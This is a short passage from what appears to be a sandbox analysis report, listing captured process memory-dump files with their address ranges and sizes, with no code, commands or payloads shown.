                                                                                                                                                                                • memory/4588-213-0x00007FF600000000-0x00007FF60005B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  364KB

                                                                                                                                                                                • memory/4748-231-0x00007FF600000000-0x00007FF60005B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  364KB

                                                                                                                                                                                • memory/4940-233-0x00007FF600000000-0x00007FF60005B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  364KB

                                                                                                                                                                                • memory/5000-236-0x00007FF600000000-0x00007FF60005B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  364KB

                                                                                                                                                                                • memory/5032-149-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/5032-167-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB